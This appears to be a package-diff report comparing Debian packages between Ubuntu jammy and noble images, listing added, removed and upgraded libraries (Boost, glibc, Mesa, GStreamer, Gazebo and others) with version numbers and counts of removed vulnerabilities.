➕	libboost-python1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-random-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-random1.74-dev	1.74.0-14ubuntu3
➖	libboost-random1.74.0	1.74.0-14ubuntu3
➕	libboost-random1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-random1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-regex-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-regex1.74-dev	1.74.0-14ubuntu3
➖	libboost-regex1.74.0	1.74.0-14ubuntu3
➕	libboost-regex1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-regex1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-serialization-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-serialization1.74-dev	1.74.0-14ubuntu3
➖	libboost-serialization1.74.0	1.74.0-14ubuntu3
➕	libboost-serialization1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-serialization1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-stacktrace-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-stacktrace1.74-dev	1.74.0-14ubuntu3
➖	libboost-stacktrace1.74.0	1.74.0-14ubuntu3
➕	libboost-stacktrace1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-stacktrace1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-system-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-system1.74-dev	1.74.0-14ubuntu3
➖	libboost-system1.74.0	1.74.0-14ubuntu3
➕	libboost-system1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-system1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-test-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-test1.74-dev	1.74.0-14ubuntu3
➖	libboost-test1.74.0	1.74.0-14ubuntu3
➕	libboost-test1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-test1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-thread-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-thread1.74-dev	1.74.0-14ubuntu3
➖	libboost-thread1.74.0	1.74.0-14ubuntu3
➕	libboost-thread1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-thread1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-timer-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-timer1.74-dev	1.74.0-14ubuntu3
➖	libboost-timer1.74.0	1.74.0-14ubuntu3
➕	libboost-timer1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-timer1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-tools-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
♾️	libboost-type-erasure-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-type-erasure1.74-dev	1.74.0-14ubuntu3
➖	libboost-type-erasure1.74.0	1.74.0-14ubuntu3
➕	libboost-type-erasure1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-type-erasure1.83.0		1.83.0-2.1ubuntu3.2
➕	libboost-url-dev		1.83.0.1ubuntu2
➕	libboost-url1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-url1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-wave-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-wave1.74-dev	1.74.0-14ubuntu3
➖	libboost-wave1.74.0	1.74.0-14ubuntu3
➕	libboost-wave1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-wave1.83.0		1.83.0-2.1ubuntu3.2
➖	libboost1.74-dev	1.74.0-14ubuntu3
➖	libboost1.74-tools-dev	1.74.0-14ubuntu3
➕	libboost1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost1.83-tools-dev		1.83.0-2.1ubuntu3.2
♾️	libbrotli-dev	1.0.9-2build6	1.1.0-2build2
♾️	libbrotli1	1.0.9-2build6	1.1.0-2build2
♾️	libbs2b0	3.1.0+dfsg-2.2build1	3.1.0+dfsg-7build1
♾️	libbsd-dev	0.11.5-1	0.12.1-1build1.1
♾️	libbsd0	0.11.5-1	0.12.1-1build1.1
♾️	libbullet-dev	3.06+dfsg-4build2	3.24+dfsg-2.1build1
➖	libbullet3.06	3.06+dfsg-4build2
➕	libbullet3.24t64		3.24+dfsg-2.1build1
♾️	libbz2-1.0	1.0.8-5build1	1.0.8-5.1build0.1
➕	libbz2-dev		1.0.8-5.1build0.1
♾️	libc-bin	2.35-0ubuntu3.11	2.39-0ubuntu8.7
♾️	libc-dev-bin	2.35-0ubuntu3.11	2.39-0ubuntu8.7
♾️	libc6	2.35-0ubuntu3.11	2.39-0ubuntu8.7
♾️	libc6-armhf-cross	2.35-0ubuntu1cross3	2.39-0ubuntu8cross1
♾️	libc6-dbg	2.35-0ubuntu3.11	2.39-0ubuntu8.7
♾️	libc6-dev	2.35-0ubuntu3.11	2.39-0ubuntu8.7
♾️	libc6-dev-armhf-cross	2.35-0ubuntu1cross3	2.39-0ubuntu8cross1
➖	libc6-i386	2.35-0ubuntu3.11
➖	libcaca-dev	0.99.beta19-2.2ubuntu4
♾️	libcaca0	0.99.beta19-2.2ubuntu4	0.99.beta20-4ubuntu0.1
		Removed vulnerabilities (1):
♾️	libcairo-gobject2	1.16.0-5ubuntu2	1.18.0-3build1
➕	libcairo-script-interpreter2		1.18.0-3build1
♾️	libcairo2	1.16.0-5ubuntu2	1.18.0-3build1
➕	libcairo2-dev		1.18.0-3build1
♾️	libcap-dev	1:2.44-1ubuntu0.22.04.2	1:2.66-5ubuntu2.2
♾️	libcap-ng0	0.7.9-2.2build3	0.8.4-2build2
♾️	libcap2	1:2.44-1ubuntu0.22.04.2	1:2.66-5ubuntu2.2
♾️	libcap2-bin	1:2.44-1ubuntu0.22.04.2	1:2.66-5ubuntu2.2
➕	libcapture-tiny-perl		0.48-2
➕	libcbor0.10		0.10.2-1.2ubuntu2
➖	libcbor0.8	0.8.0-2ubuntu1
♾️	libcc1-0	12.3.0-1ubuntu1~22.04.2	14.2.0-4ubuntu2~24.04.1
➖	libcdio-cdda2	10.2+2.0.0-1build3
➕	libcdio-cdda2t64		10.2+2.0.1-1.1build2
➖	libcdio-paranoia2	10.2+2.0.0-1build3
➕	libcdio-paranoia2t64		10.2+2.0.1-1.1build2
➖	libcdio19	2.1.0-3ubuntu0.2
➕	libcdio19t64		2.1.0-4.1ubuntu1.2
♾️	libcdparanoia0	3.10.2+debian-14build2	3.10.2+debian-14build3
♾️	libcdt5	2.42.2-6ubuntu0.1	2.42.2-9ubuntu0.1
♾️	libcfitsio-dev	4.0.0-1	4.3.1-1.1build2
➕	libcfitsio10t64		4.3.1-1.1build2
➖	libcfitsio9	4.0.0-1
♾️	libcgraph6	2.42.2-6ubuntu0.1	2.42.2-9ubuntu0.1
➖	libcharls-dev	2.3.4-1
♾️	libcharls2	2.3.4-1	2.4.2-2build2
♾️	libchromaprint1	1.5.1-2	1.5.1-5
➕	libcjson1		1.7.17-1
➖	libclang1-14	1:14.0.0-1ubuntu1.1
➕	libclang1-15t64		1:15.0.7-14build3
➕	libclang1-18		1:18.1.3-1ubuntu1
➕	libclass-c3-perl		0.35-2
➕	libclass-data-inheritable-perl		0.08-3
➕	libclass-inspector-perl		1.36-3
➕	libclass-method-modifiers-perl		2.15-1
➕	libclass-singleton-perl		1.6-2
➖	libcodec2-1.0	1.0.1-3
➕	libcodec2-1.2		1.2.0-2build1
♾️	libcolord2	1.4.6-1	1.4.7-1build2
♾️	libcom-err2	1.46.5-2ubuntu1.2	1.47.0-2.4~exp1ubuntu4.1
♾️	libconsole-bridge-dev	1.0.1+dfsg2-3	1.0.1+dfsg2-3build1
♾️	libconsole-bridge1.0	1.0.1+dfsg2-3	1.0.1+dfsg2-3build1
♾️	libcrypt-dev	1:4.4.27-1	1:4.4.36-4build1
♾️	libcrypt1	1:4.4.27-1	1:4.4.36-4build1
♾️	libcryptsetup12	2:2.4.3-1ubuntu1.3	2:2.7.0-1ubuntu4.2
➖	libcsfml-audio2.5	2.5-1.1
➕	libcsfml-audio2.6		2.6.0-3build1
♾️	libcsfml-dev	2.5-1.1	2.6.0-3build1
➖	libcsfml-graphics2.5	2.5-1.1
➕	libcsfml-graphics2.6		2.6.0-3build1
➖	libcsfml-network2.5	2.5-1.1
➕	libcsfml-network2.6		2.6.0-3build1
➖	libcsfml-system2.5	2.5-1.1
➕	libcsfml-system2.6		2.6.0-3build1
➖	libcsfml-window2.5	2.5-1.1
➕	libcsfml-window2.6		2.6.0-3build1
♾️	libctf-nobfd0	2.38-4ubuntu2.12	2.42-4ubuntu2.8
♾️	libctf0	2.38-4ubuntu2.12	2.42-4ubuntu2.8
➖	libcups2	2.4.1op1-1ubuntu4.16
➕	libcups2t64		2.4.7-1.2ubuntu7.9
➖	libcurl3-gnutls	7.81.0-1ubuntu1.21
➕	libcurl3t64-gnutls		8.5.0-2ubuntu10.6
➖	libcurl4	7.81.0-1ubuntu1.21
♾️	libcurl4-openssl-dev	7.81.0-1ubuntu1.21	8.5.0-2ubuntu10.6
➕	libcurl4t64		8.5.0-2ubuntu10.6
♾️	libdart-core+collisions+odelcpsolver6.13	6.13.2+ds1-1~osrf2~jammy	6.13.2+ds1-1~osrf2~noble
➕	libdata-optlist-perl		0.114-1
➕	libdatetime-locale-perl		1:1.37-1
➕	libdatetime-perl		2:1.65-1build2
➕	libdatetime-timezone-perl		1:2.62-1+2024a
➕	libdatrie-dev		0.2.13-3build1
♾️	libdatrie1	0.2.13-2	0.2.13-3build1
♾️	libdav1d-dev	0.9.2-1	1.4.1-1build1
➖	libdav1d5	0.9.2-1
➕	libdav1d7		1.4.1-1build1
➖	libdb5.3	5.3.28+dfsg1-0.8ubuntu3
➕	libdb5.3t64		5.3.28+dfsg2-7
♾️	libdbus-1-3	1.12.20-2ubuntu4.1	1.14.10-4ubuntu4.1
♾️	libdbus-1-dev	1.12.20-2ubuntu4.1	1.14.10-4ubuntu4.1
♾️	libdc1394-25	2.2.6-4	2.2.6-4build1
♾️	libdc1394-dev	2.2.6-4	2.2.6-4build1
♾️	libdca0	0.0.7-2	0.0.7-2build1
♾️	libdconf1	0.40.0-3ubuntu0.1	0.40.0-4ubuntu0.1
♾️	libde265-0	1.0.8-1ubuntu0.3	1.0.15-1build3
♾️	libde265-dev	1.0.8-1ubuntu0.3	1.0.15-1build3
♾️	libdebconfclient0	0.261ubuntu1	0.271ubuntu3
♾️	libdecor-0-0	0.1.0-3build1	0.2.2-1build2
♾️	libdecor-0-dev	0.1.0-3build1	0.2.2-1build2
♾️	libdeflate-dev	1.10-2	1.19-1build1.1
♾️	libdeflate0	1.10-2	1.19-1build1.1
➕	libdevel-callchecker-perl		0.008-2build3
➕	libdevel-stacktrace-perl		2.0500-1
♾️	libdevmapper1.02.1	2:1.02.175-2.1ubuntu5	2:1.02.185-3ubuntu3.2
➕	libdirectfb-1.7-7t64		1.7.7-11.1ubuntu2
♾️	libdouble-conversion-dev	3.1.7-4	3.3.0-1build1
♾️	libdouble-conversion3	3.1.7-4	3.3.0-1build1
♾️	libdpkg-perl	1.21.1ubuntu2.6	1.22.6ubuntu6.5
➖	libdraco-dev	1.5.2+dfsg-2
➖	libdraco4	1.5.2+dfsg-2
➕	libdraco8		1.5.6+dfsg-3build1
♾️	libdrm-amdgpu1	2.4.113-2~ubuntu0.22.04.1	2.4.125-1ubuntu0.1~24.04.1
♾️	libdrm-common	2.4.113-2~ubuntu0.22.04.1	2.4.125-1ubuntu0.1~24.04.1
♾️	libdrm-dev	2.4.113-2~ubuntu0.22.04.1	2.4.125-1ubuntu0.1~24.04.1
♾️	libdrm-intel1	2.4.113-2~ubuntu0.22.04.1	2.4.125-1ubuntu0.1~24.04.1
♾️	libdrm-nouveau2	2.4.113-2~ubuntu0.22.04.1	2.4.125-1ubuntu0.1~24.04.1
♾️	libdrm-radeon1	2.4.113-2~ubuntu0.22.04.1	2.4.125-1ubuntu0.1~24.04.1
♾️	libdrm2	2.4.113-2~ubuntu0.22.04.1	2.4.125-1ubuntu0.1~24.04.1
➕	libduktape207		2.7.0+tests-0ubuntu3
➖	libdv4	1.0.0-14build1
➕	libdv4t64		1.0.0-17.1build1
♾️	libdvdnav4	6.1.1-1	6.1.1-3build1
➖	libdvdread8	6.1.2-1
➕	libdvdread8t64		6.1.3-1.1build1
♾️	libdw-dev	0.186-1ubuntu0.1	0.190-1.1ubuntu0.1
➖	libdw1	0.186-1ubuntu0.1
➕	libdw1t64		0.190-1.1ubuntu0.1
➕	libdynaloader-functions-perl		0.003-3
♾️	libedit2	3.1-20210910-1build1	3.1-20230828-1build1
♾️	libegl-dev	1.4.0-1	1.7.0-1build1
♾️	libegl-mesa0	23.2.1-1ubuntu3.1~22.04.3	25.2.8-0ubuntu0.24.04.1
♾️	libegl1	1.4.0-1	1.7.0-1build1
♾️	libegl1-mesa-dev	23.2.1-1ubuntu3.1~22.04.3	25.2.8-0ubuntu0.24.04.1
♾️	libeigen3-dev	3.4.0-2ubuntu2	3.4.0-4build0.1
♾️	libelf-dev	0.186-1ubuntu0.1	0.190-1.1ubuntu0.1
➖	libelf1	0.186-1ubuntu0.1
➕	libelf1t64		0.190-1.1ubuntu0.1
➕	libepoxy-dev		1.5.10-1build1
♾️	libepoxy0	1.5.10-1	1.5.10-1build1
♾️	liberror-perl	0.17029-1	0.17029-2
♾️	libev-dev	1:4.33-1	1:4.33-2.1build1
➖	libev4	1:4.33-1
➕	libev4t64		1:4.33-2.1build1
➕	libeval-closure-perl		0.14-3
♾️	libevdev2	1.12.1+dfsg-1	1.13.1+dfsg-1build1
➖	libevent-2.1-7	2.1.12-stable-1build3
➕	libevent-2.1-7t64		2.1.12-stable-9ubuntu2
➖	libevent-core-2.1-7	2.1.12-stable-1build3
➕	libevent-core-2.1-7t64		2.1.12-stable-9ubuntu2
♾️	libevent-dev	2.1.12-stable-1build3	2.1.12-stable-9ubuntu2
➖	libevent-extra-2.1-7	2.1.12-stable-1build3
➕	libevent-extra-2.1-7t64		2.1.12-stable-9ubuntu2
➖	libevent-openssl-2.1-7	2.1.12-stable-1build3
➕	libevent-openssl-2.1-7t64		2.1.12-stable-9ubuntu2
➖	libevent-pthreads-2.1-7	2.1.12-stable-1build3
➕	libevent-pthreads-2.1-7t64		2.1.12-stable-9ubuntu2
➕	libexception-class-perl		1.45-1
♾️	libexif-dev	0.6.24-1build1	0.6.24-1build2
♾️	libexif12	0.6.24-1build1	0.6.24-1build2
♾️	libexpat1	2.4.7-1ubuntu0.6	2.6.1-2ubuntu0.4
		Removed vulnerabilities (2):
♾️	libexpat1-dev	2.4.7-1ubuntu0.6	2.6.1-2ubuntu0.4
➖	libext2fs2	1.46.5-2ubuntu1.2
➕	libext2fs2t64		1.47.0-2.4~exp1ubuntu4.1
♾️	libfaad2	2.10.0-2	2.11.1-1build1
♾️	libfabric1	1.11.0-3	1.17.0-3build2
♾️	libfcl0.7	0.7.0-3	0.7.0-3build2
➕	libfdisk1		2.39.3-9ubuntu6.4
♾️	libffi-dev	3.4.2-4	3.4.6-1build1
♾️	libffi8	3.4.2-4	3.4.6-1build1
➕	libfftw3-double3		3.3.10-1ubuntu3
♾️	libfido2-1	1.10.0-1	1.14.0-1build3

[JLP04]

Packages and Vulnerabilities (3003 package changes and 236 vulnerability changes)

• ➕ 864 packages added
• ➖ 682 packages removed
• ♾️ 1457 packages changed
• 134 packages unchanged

• ❗ 10 vulnerabilities added
• ✔️ 226 vulnerabilities removed

Changes for packages of type deb (2656 changes)

➕	libfile-sharedir-perl		1.118-3
♾️	libflac-dev	1.3.3-2ubuntu0.2	1.4.3+ds-2.1ubuntu2
➕	libflac12t64		1.4.3+ds-2.1ubuntu2
➖	libflac8	1.3.3-2ubuntu0.2
♾️	libflann-dev	1.9.1+dfsg-11	1.9.2+dfsg-2build1
♾️	libflann1.9	1.9.1+dfsg-11	1.9.2+dfsg-2build1
♾️	libflite1	2.2-3	2.2-6build3
♾️	libfluidsynth3	2.2.5-1	2.3.4-1build3
♾️	libfmt-dev	8.1.1+ds1-2	9.1.0+ds1-2
➖	libfmt8	8.1.1+ds1-2
➕	libfmt9		9.1.0+ds1-2
♾️	libfontconfig-dev	2.13.1-4.2ubuntu5	2.15.0-1.1ubuntu2
♾️	libfontconfig1	2.13.1-4.2ubuntu5	2.15.0-1.1ubuntu2
♾️	libfontconfig1-dev	2.13.1-4.2ubuntu5	2.15.0-1.1ubuntu2
♾️	libfontenc1	1:1.1.4-1build3	1:1.1.8-1build1
♾️	libfreeaptx0	0.1.1-1	0.1.1-2build1
♾️	libfreeimage-dev	3.18.0+ds2-6ubuntu5.1	3.18.0+ds2-10build4
♾️	libfreeimage3	3.18.0+ds2-6ubuntu5.1	3.18.0+ds2-10build4
♾️	libfreetype-dev	2.11.1+dfsg-1ubuntu0.3	2.13.2+dfsg-1build3
♾️	libfreetype6	2.11.1+dfsg-1ubuntu0.3	2.13.2+dfsg-1build3
➖	libfreetype6-dev	2.11.1+dfsg-1ubuntu0.3
♾️	libfreexl-dev	1.0.6-1	2.0.0-1build2
♾️	libfreexl1	1.0.6-1	2.0.0-1build2
➕	libfribidi-dev		1.0.13-3build1
♾️	libfribidi0	1.0.8-2ubuntu3.1	1.0.13-3build1
♾️	libfyba-dev	4.1.1-7	4.1.1-11build1
➖	libfyba0	4.1.1-7
➕	libfyba0t64		4.1.1-11build1
♾️	libgbm-dev	23.2.1-1ubuntu3.1~22.04.3	25.2.8-0ubuntu0.24.04.1
♾️	libgbm1	23.2.1-1ubuntu3.1~22.04.3	25.2.8-0ubuntu0.24.04.1
➖	libgcc-11-dev	11.4.0-1ubuntu1~22.04.2
➖	libgcc-11-dev-armhf-cross	11.4.0-1ubuntu1~22.04cross1
➕	libgcc-13-dev		13.3.0-6ubuntu2~24.04.1
➕	libgcc-13-dev-armhf-cross		13.3.0-6ubuntu2~24.04cross1
♾️	libgcc-s1	12.3.0-1ubuntu1~22.04.2	14.2.0-4ubuntu2~24.04.1
♾️	libgcc-s1-armhf-cross	12.3.0-1ubuntu1~22.04cross1	14.2.0-4ubuntu2~24.04cross1
♾️	libgcrypt20	1.9.4-3ubuntu3	1.10.3-2build1
♾️	libgd3	2.3.0-2ubuntu2.3	2.3.3-9ubuntu5
♾️	libgdal-dev	3.4.1+dfsg-1build4	3.8.4+dfsg-3ubuntu3
➖	libgdal30	3.4.1+dfsg-1build4
➕	libgdal34t64		3.8.4+dfsg-3ubuntu3
➖	libgdbm-compat4	1.23-1
➕	libgdbm-compat4t64		1.23-5.1build1
➖	libgdbm6	1.23-1
➕	libgdbm6t64		1.23-5.1build1
♾️	libgdcm-dev	3.0.10-1build2	3.0.22-2.1ubuntu1
➖	libgdcm3.0	3.0.10-1build2
➕	libgdcm3.0t64		3.0.22-2.1ubuntu1
♾️	libgdk-pixbuf-2.0-0	2.42.8+dfsg-1ubuntu0.4	2.42.10+dfsg-3ubuntu3.2
➕	libgdk-pixbuf-2.0-dev		2.42.10+dfsg-3ubuntu3.2
➕	libgdk-pixbuf2.0-bin		2.42.10+dfsg-3ubuntu3.2
♾️	libgdk-pixbuf2.0-common	2.42.8+dfsg-1ubuntu0.4	2.42.10+dfsg-3ubuntu3.2
➖	libgeographic-dev	1.52-1
➖	libgeographic19	1.52-1
➕	libgeographiclib-dev		2.3-1build1
➕	libgeographiclib26		2.3-1build1
➕	libgeos-c1t64		3.12.1-3build1
➖	libgeos-c1v5	3.10.2-1
♾️	libgeos-dev	3.10.2-1	3.12.1-3build1
➖	libgeos3.10.2	3.10.2-1
➕	libgeos3.12.1t64		3.12.1-3build1
♾️	libgeotiff-dev	1.7.0-2build1	1.7.1-5build1
♾️	libgeotiff5	1.7.0-2build1	1.7.1-5build1
➖	libgfortran-11-dev	11.4.0-1ubuntu1~22.04.2
➕	libgfortran-13-dev		13.3.0-6ubuntu2~24.04.1
♾️	libgfortran5	12.3.0-1ubuntu1~22.04.2	14.2.0-4ubuntu2~24.04.1
♾️	libgif-dev	5.1.9-2ubuntu0.1	5.2.2-1ubuntu1
♾️	libgif7	5.1.9-2ubuntu0.1	5.2.2-1ubuntu1
♾️	libgirepository-1.0-1	1.72.0-1	1.80.1-1
➕	libgirepository-2.0-0		2.80.0-6ubuntu3.8
♾️	libgl-dev	1.4.0-1	1.7.0-1build1
♾️	libgl1	1.4.0-1	1.7.0-1build1
♾️	libgl1-mesa-dev	23.2.1-1ubuntu3.1~22.04.3	25.2.8-0ubuntu0.24.04.1
♾️	libgl1-mesa-dri	23.2.1-1ubuntu3.1~22.04.3	25.2.8-0ubuntu0.24.04.1
♾️	libgl2ps-dev	1.4.2+dfsg1-2	1.4.2+dfsg1-2build1
♾️	libgl2ps1.4	1.4.2+dfsg1-2	1.4.2+dfsg1-2build1
➖	libglapi-mesa	23.2.1-1ubuntu3.1~22.04.3
♾️	libgles-dev	1.4.0-1	1.7.0-1build1
♾️	libgles1	1.4.0-1	1.7.0-1build1
♾️	libgles2	1.4.0-1	1.7.0-1build1
♾️	libglew-dev	2.2.0-4	2.2.0-4build1
♾️	libglew2.2	2.2.0-4	2.2.0-4build1
➖	libglib2.0-0	2.72.4-0ubuntu2.6
➕	libglib2.0-0t64		2.80.0-6ubuntu3.8
♾️	libglib2.0-bin	2.72.4-0ubuntu2.6	2.80.0-6ubuntu3.8
♾️	libglib2.0-data	2.72.4-0ubuntu2.6	2.80.0-6ubuntu3.8
♾️	libglib2.0-dev	2.72.4-0ubuntu2.6	2.80.0-6ubuntu3.8
		Removed vulnerabilities (9):
♾️	libglib2.0-dev-bin	2.72.4-0ubuntu2.6	2.80.0-6ubuntu3.8
♾️	libglu1-mesa	9.0.2-1	9.0.2-1.1build1
♾️	libglu1-mesa-dev	9.0.2-1	9.0.2-1.1build1
♾️	libglvnd-core-dev	1.4.0-1	1.7.0-1build1
♾️	libglvnd-dev	1.4.0-1	1.7.0-1build1
♾️	libglvnd0	1.4.0-1	1.7.0-1build1
♾️	libglx-dev	1.4.0-1	1.7.0-1build1
♾️	libglx-mesa0	23.2.1-1ubuntu3.1~22.04.3	25.2.8-0ubuntu0.24.04.1
♾️	libglx0	1.4.0-1	1.7.0-1build1
♾️	libgme0	0.6.3-2	0.6.3-7build1
♾️	libgmp10	2:6.2.1+dfsg-3ubuntu1	2:6.3.0+dfsg-2ubuntu6.1
➖	libgnutls30	3.7.3-4ubuntu1.7
		Removed vulnerabilities (2):
➕	libgnutls30t64		3.8.3-1.1ubuntu3.5
♾️	libgomp1	12.3.0-1ubuntu1~22.04.2	14.2.0-4ubuntu2~24.04.1
♾️	libgomp1-armhf-cross	12.3.0-1ubuntu1~22.04cross1	14.2.0-4ubuntu2~24.04cross1
♾️	libgpg-error0	1.43-3	1.47-3build2.1
➖	libgphoto2-6	2.5.27-1build2
➕	libgphoto2-6t64		2.5.31-2.1ubuntu1
♾️	libgphoto2-dev	2.5.27-1build2	2.5.31-2.1ubuntu1
➖	libgphoto2-port12	2.5.27-1build2
➕	libgphoto2-port12t64		2.5.31-2.1ubuntu1
♾️	libgpm2	1.20.7-10build1	1.20.7-11
➕	libgprofng0		2.42-4ubuntu2.8
♾️	libgraphene-1.0-0	1.10.8-1	1.10.8-3build2
♾️	libgraphite2-3	1.3.14-1build2	1.3.14-2build1
➕	libgraphite2-dev		1.3.14-2build1
♾️	libgsm1	1.0.19-1	1.0.22-1build1
♾️	libgssapi-krb5-2	1.19.2-2ubuntu0.7	1.20.1-6ubuntu2.6
➖	libgssdp-1.2-0	1.4.0.1-2build1
➕	libgssdp-1.6-0		1.6.3-1build3
➖	libgssrpc4	1.19.2-2ubuntu0.7
➕	libgssrpc4t64		1.20.1-6ubuntu2.6
♾️	libgstreamer-gl1.0-0	1.20.1-1ubuntu0.5	1.24.2-1ubuntu0.3
♾️	libgstreamer-plugins-bad1.0-0	1.20.3-0ubuntu1.1	1.24.2-1ubuntu4
♾️	libgstreamer-plugins-base1.0-0	1.20.1-1ubuntu0.5	1.24.2-1ubuntu0.3
♾️	libgstreamer-plugins-base1.0-dev	1.20.1-1ubuntu0.5	1.24.2-1ubuntu0.3
♾️	libgstreamer-plugins-good1.0-0	1.20.3-0ubuntu1.4	1.24.2-1ubuntu1.2
♾️	libgstreamer1.0-0	1.20.3-0ubuntu1.1	1.24.2-1ubuntu0.1
♾️	libgstreamer1.0-dev	1.20.3-0ubuntu1.1	1.24.2-1ubuntu0.1
♾️	libgtest-dev	1.11.0-3	1.14.0-1
➖	libgtk-3-0	3.24.33-1ubuntu2.2
➕	libgtk-3-0t64		3.24.41-4ubuntu1.3
♾️	libgtk-3-common	3.24.33-1ubuntu2.2	3.24.41-4ubuntu1.3
➕	libgtk-3-dev		3.24.41-4ubuntu1.3
➖	libgts-0.7-5	0.7.6+darcs121130-5
➕	libgts-0.7-5t64		0.7.6+darcs121130-5.2build1
♾️	libgts-dev	0.7.6+darcs121130-5	0.7.6+darcs121130-5.2build1
♾️	libgudev-1.0-0	1:237-2build1	1:238-5ubuntu1
♾️	libgudev-1.0-dev	1:237-2build1	1:238-5ubuntu1
➖	libgupnp-1.2-1	1.4.3-1
➕	libgupnp-1.6-0		1.6.6-1build3
➖	libgupnp-igd-1.0-4	1.2.0-1build1
➕	libgupnp-igd-1.6-0		1.6.0-3build3
♾️	libgvc6	2.42.2-6ubuntu0.1	2.42.2-9ubuntu0.1
♾️	libgvpr2	2.42.2-6ubuntu0.1	2.42.2-9ubuntu0.1
♾️	libgz-cmake3-dev	3.5.5-1~jammy	3.5.6-1~noble
♾️	libgz-common5	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-av	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-av-dev	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-core-dev	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-dev	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-events	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-events-dev	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-geospatial	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-geospatial-dev	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-graphics	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-graphics-dev	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-io	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-io-dev	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-profiler	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-profiler-dev	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-testing	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-testing-dev	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-fuel-tools9	9.1.1-1~jammy	9.1.1-1~noble
♾️	libgz-fuel-tools9-dev	9.1.1-1~jammy	9.1.1-1~noble
♾️	libgz-gui8	8.4.0-1~jammy	8.4.0-1~noble
♾️	libgz-gui8-dev	8.4.0-1~jammy	8.4.0-1~noble
♾️	libgz-launch7	7.1.1-1~jammy	7.1.1-1~noble
♾️	libgz-launch7-dev	7.1.1-1~jammy	7.1.1-1~noble
♾️	libgz-math7	7.5.1-1~jammy	7.5.1-1~noble
♾️	libgz-math7-dev	7.5.1-1~jammy	7.5.1-1~noble
♾️	libgz-math7-eigen3-dev	7.5.1-1~jammy	7.5.1-1~noble
♾️	libgz-msgs10	10.3.2-1~jammy	10.3.2-1~noble
♾️	libgz-msgs10-dev	10.3.2-1~jammy	10.3.2-1~noble
♾️	libgz-physics7	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-bullet	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-bullet-dev	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-core-dev	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-dartsim	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-dartsim-dev	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-dev	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-heightmap-dev	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-mesh-dev	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-sdf-dev	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-tpe	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-tpe-dev	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-tpelib	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-tpelib-dev	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-plugin2	2.0.4-1~jammy	2.0.4-1~noble
♾️	libgz-plugin2-dev	2.0.4-1~jammy	2.0.4-1~noble
♾️	libgz-rendering8	8.2.3-1~jammy	8.2.3-1~noble
♾️	libgz-rendering8-core-dev	8.2.3-1~jammy	8.2.3-1~noble
♾️	libgz-rendering8-dev	8.2.3-1~jammy	8.2.3-1~noble
♾️	libgz-rendering8-ogre1	8.2.3-1~jammy	8.2.3-1~noble
♾️	libgz-rendering8-ogre1-dev	8.2.3-1~jammy	8.2.3-1~noble
♾️	libgz-rendering8-ogre2	8.2.3-1~jammy	8.2.3-1~noble
♾️	libgz-rendering8-ogre2-dev	8.2.3-1~jammy	8.2.3-1~noble
♾️	libgz-sensors8	8.2.2-1~jammy	8.2.2-1~noble
